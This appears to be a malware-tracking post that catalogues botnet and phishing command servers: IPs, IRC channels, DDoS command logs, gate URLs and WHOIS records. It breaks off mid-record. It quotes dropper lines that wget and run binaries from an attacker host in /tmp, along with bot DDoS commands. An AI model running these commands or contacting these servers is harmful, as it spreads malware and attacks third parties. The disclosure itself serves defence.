This is spreading through torrents and cracks and looks like a password stealer.
Domains and IPs used:

185.61.138.235 (STD Botnet hosted in Ukraine Kiev Blazingfast Llc)
Another STD botnet found by abigail.
Server: 185.61.138.235
Port: 443
Channel: #secgod
DDOS Coming Up:
<~Broken> >bot +std 70.127.120.174 80 30
[STD]Hitting 70.127.120.174!
[STD]Done hitting 70.127.120.174!
<~Broken> >bot +stop
Killing pid 13923.
Other url: http://93.174.93.45/f.sh
#!/bin/sh
cd /tmp && wget http://93.174.93.45/mosh && chmod +x mosh && ./mosh
cd /tmp && wget http://93.174.93.45/mox64

191.235.178.122 (Modified Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)
Found by abigail.
Server: 191.235.178.122
Port: 443
Channel: #sh
DDOS Coming Up lol:
<~Haze> >bot +std 172.56.41.67 80 120
[STD]Hitting 172.56.41.67!
[STD]Hitting 172.56.41.67!
[STD]Done hitting 172.56.41.67!
[STD]Done hitting 172.56.41.67!
You can download the bot here.
Other: http://5.152.206.162/getbinaries.sh
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR

jdsiwiqweiqwyreqwi.com (Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)
Domains used by the malware:
34324325kgkgfkgf.com
dsffdsk323721372131.com
fdshjfsh324332432.com
jdsiwiqweiqwyreqwi.com
80.242.123.208
HTTP Requests:
URI: http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php
DATA:
POST /dffgbDFGvf465/YYf.php HTTP/1.0
Host: jdsiwiqweiqwyreqwi.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 272
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
samples:

89.248.172.240 (30k botnet hosted in Netherlands Amsterdam Ecatel Ltd)
Botnet found by sPy. Only the server and port are listed here, with no channels, because there is no exe file to examine for more. Feel free to check for channels yourself.
Connecting to 89.248.172.240 (6667)
Invisible Users 12: 12 3554
Operators: 2 operator(s) online
Channels: 12 channels formed
Clients: I have 3555 clients and 0 servers
Local users: 3555 29989 Current local users

Linux Botnet Hosted In blackunix.us
This is the bot used to scan for vulnerabilities: hxxp://pastebin.com/dEMULiQV
Now talking in #botnets
Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ]
Topic By : [ uyap ]
Modes On : [ #botnets ] [ +smntrMuk fcuked ]
The bot is hosted here: hxxp://visionafricamagazine.com/scripts/x.log

onetimes27s.com (Reverse Dns Bot hosted in Russian Federation Saint Petersburg Majordomo Llc)
This package was posted on a hacking board as an HTTP bot. Results after checking the file:
Domains used:
hoseen454r.com inactive
onetimes27s.com active
Resolved : [ onetimes27s.com ] To [ 178.250.245.186 ]
Panel: hxxp://178.250.245.186/pref1/ (password protected)
Sample here
Hosting info: http://whois.domaintools.com/178.250.245.186

gki2mpdt3rsokbmv.onion (Irc botnet hosted on a Tor hidden service)
Server: gki2mpdt3rsokbmv.onion
Port: 6667
Channel: #channel
Oper:
[wac] (wac@9bedb2.host): ac
[wac] #channel
[wac] lair.hell.net :Cerberus Server
[wac] idle 00:00:18, signon: Tue May 13 18:24:47
[wac] End of WHOIS list.
The owner must have used very old bot code to create this, as it fails to work properly on Windows 7 and higher.
Related md5s (Download sample from Malwr.com)
Ircbot:

sinsec.net (Betabot http botnet hosted by alibabahost.com)
Resolved sinsec.net to 37.221.170.96
Server: sinsec.net
Gate file: /turndown/order.php
Alternate domains: divinestresser.info radicalpkz.com perp.pw thefox.pw uploadme.pw perp.se
Domain info: sinsec.net
Domain Name: SINSEC.NET
Registry Domain ID: 1814650535_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2013-07-12 10:27:24Z
Creation Date: 2013-07-12 17:27:00Z
Registrar Registration Expiration Date: 2014-07-12 17:27:00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48

api.wifi-update.biz (Betabot http botnet hosted by oneandone.net)
Resolved api.wifi-update.biz to 87.106.241.22
Server: api.wifi-update.biz
Gate file: /cdn/img.php
Alternate domains: api-radio-def.de api.lul.pw api.tba.pw
Domain info: wifi-update.biz
Domain Name: WIFI-UPDATE.BIZ
Domain ID: D58641421-BIZ
Sponsoring Registrar: BIZCN.COM, INC.
Sponsoring Registrar IANA ID: 471
Registrar URL (registration services): www.bizcn.com
Domain Status: clientTransferProhibited
Registrant ID: ORGEH90335606834
Registrant Name: Erkki Hagstrom
Registrant Organization: ErkkiHagstrom
Registrant Address1: Gesterbyntie 51
Registrant